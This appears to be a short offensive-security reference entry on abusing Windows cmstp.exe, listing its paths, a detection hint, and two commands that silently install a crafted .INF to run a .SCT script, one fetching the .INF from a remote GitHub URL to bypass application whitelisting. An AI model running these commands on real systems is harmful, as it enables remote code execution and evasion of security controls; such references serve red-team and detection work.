~/Privilege Escalation/Windows/Binaries# cat Cmstp.exe.md

Installs or removes a Connection Manager service profile.

Paths:

C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe

Detection: Execution of cmstp.exe should not be normal unless VPN is in use Cmstp.exe communication towards internet and getting files

Execute

Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s c:\cmstp\CorpVPN.inf

AWL bypass

Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.

cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf